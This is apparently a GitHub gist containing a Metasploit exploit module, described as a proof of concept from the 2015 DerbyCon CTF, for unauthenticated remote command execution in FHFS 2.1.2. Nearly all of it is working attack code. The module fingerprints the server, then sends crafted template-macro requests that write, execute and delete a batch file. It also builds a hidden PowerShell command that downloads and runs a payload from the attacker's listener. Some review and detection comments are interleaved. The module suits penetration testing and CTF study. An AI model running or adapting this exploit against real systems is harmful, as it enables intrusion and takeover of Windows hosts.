@ztgrace
Created October 10, 2015 21:40
PoC exploit used by the Cult of the Glowing Rectangle at the 2015 DerbyCon CTF
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::Powershell
  #include Msf::Exploit::FileDropper

  # Module metadata and user-facing options.
  #
  # @param info [Hash] base module info merged by update_info
  def initialize(info={})
    super(update_info(info,
      'Name' => "FHFS - FTP/HTTP File Server 2.1.2",
      'Description' => %q{
FHFS FTP/HTTP File Server (FHFS) is vulnerable to a remote command execution attack.
The exec command allows for unauthenticated command execution on the host system.
However, testing idicated that it failed to process anything other than a base command.
This module combines the exec and save commands to achieve arbitrary code execution using
powershell. Note: due to the way the server processes commands, this module should spawn
two shells.
},
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Naser Farhadi', # Original Exploit Author
          'Zach Grace @ztgrace', # metasploit author
          'Trenton Ivey @TrentonIvey', # metasploit author
        ],
      'References' =>
        [
          ['URL', 'https://www.exploit-db.com/exploits/37985/'],
          ['URL', 'https://warroom.securestate.com/index.php/tag/fhfs/'],
        ],
      # Bytes the encoded payload must not contain: CR, LF, NUL and space.
      'Payload' => { 'BadChars' => "\x0d\x0a\x00\x20" },
      'Space' => 2014,
      'Platform' => 'win',
      'Targets' =>
        [
          [ 'Automatic', {} ],
        ],
      'Privileged' => true,
      # Aggressive stance: the local HTTP listener is started by #exploit
      # and the requests in #primer are sent without waiting for a client.
      'Stance' => Msf::Exploit::Stance::Aggressive,
      'DisclosureDate' => "Aug 27 2015",
      'DefaultTarget' => 0))
    register_options(
      [
        # NOTE(review): registered but not referenced by the visible methods;
        # #check and #primer request hard-coded '/' paths.
        OptString.new('TARGETURI', [true, 'The path of the web application', '/']),
        # Upper bound on how long the listener started in #exploit stays up.
        OptInt.new('HTTPDELAY', [false, 'Seconds to wait before terminating web server', 30]),
      ], self.class)
  end

  # Fingerprint the target from its HTTP "Server" response header.
  #
  # Only an exact "2.1.2" version in the banner is reported Vulnerable; any
  # other matched version is reported Safe.
  #
  # @return [Exploit::CheckCode, nil] nil when no response arrives, the Server
  #   header is absent, or it does not match the FHFS banner pattern
  # NOTE(review): an explicit Exploit::CheckCode::Unknown on that fall-through
  # path would make the "could not fingerprint" case visible to callers.
  def check
    res = send_request_raw({
      'method' => 'GET',
      'uri' => '/'
    })
    if res && res.headers['Server'] && res.headers['Server'] =~ /FHFS - FTP\/HTTP File Server - v([\d.]+)/
      version = $1 # first capture of the =~ above: the dotted version string
      print_status("FHFS version: #{version}")
      if version == "2.1.2"
        return Exploit::CheckCode::Vulnerable
      else
        return Exploit::CheckCode::Safe
      end
    end
  end

  # HttpServer callback: answer any request that reaches the listener URI with
  # the PowerShell command text built around the encoded payload. Nothing about
  # the request is validated before responding; only req.uri is read (for the log).
  #
  # @param cli [Object] the connected client handed over by the HttpServer mixin
  # @param req [Object] the parsed HTTP request
  def on_request_uri(cli, req)
    print_status("#{peer} - Payload request received: #{req.uri}")
    # Option semantics are those of Msf::Exploit::Powershell#cmd_psh_payload.
    data = cmd_psh_payload(
      payload.encoded,
      payload_instance.arch.first,
      remove_comspec: true,
      use_single_quotes: true
    )
    send_response(cli, data, 'Content-Type' => 'application/octet-stream')
  end

  # Build the one-line PowerShell command that fetches the body served by
  # #on_request_uri from get_uri (the listener URL) and evaluates it with IEX.
  #
  # @return [String] the command line, also echoed via print_status
  def psh_cmd
    # nil unless the listener is SSL; interpolating nil below yields "".
    ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
    download_and_run = "#{ignore_cert}IEX ((new-object net.webclient).downloadstring('#{get_uri}'))"
    cmd = generate_psh_command_line(
      noprofile: true,
      windowstyle: 'hidden',
      command: download_and_run
    )
    print_status("Command to execute: #{cmd}")
    return cmd
  end

  # Runs once the listener is up (the HttpServer mixin is expected to call it
  # from its #exploit). Issues the three FHFS template requests in order:
  # save the command into a .bat under C:\Windows\Temp, exec it, delete it.
  #
  # Detection note: the .bat name is random per run, so the stable observables
  # are the request URIs themselves — the FHFS macro names (save, exec, delete,
  # decodeuri) combined with a C:\Windows\Temp path in the query string.
  #
  # NOTE(review): the block parameter `payload` shadows the module's `payload`
  # accessor inside the loop; a different name would read better.
  def primer
    file_name = rand_text_alpha(10)
    file_name << ".bat"
    batch_path = "C:\\Windows\\Temp\\#{file_name}"
    cmd = psh_cmd
    payloads = [
      "/?{.save|#{batch_path}|{.decodeuri|#{URI::escape(cmd)}.}.}", # dropper
      "/?{.exec|#{batch_path}.}", # command execution
      "/?{.delete|#{batch_path}.}",
    ]
    payloads.each do |payload|
      if datastore['VERBOSE']
        print_status("Sending payload: #{payload}")
      end
      send_request_raw({
        'method' => 'GET',
        'uri' => payload,
        'timeout' => 20,
      })
      sleep 2 # fixed pause between the three requests
    end
  end

  # Start the listener via the mixin's #exploit and stop it after HTTPDELAY
  # seconds. The framework is assumed to have loaded the timeout library; no
  # require for it is visible in this file.
  def exploit
    begin
      Timeout.timeout(datastore['HTTPDELAY']) { super }
    rescue Timeout::Error
      # When the server stops due to our timeout, this is raised
    end
  end
end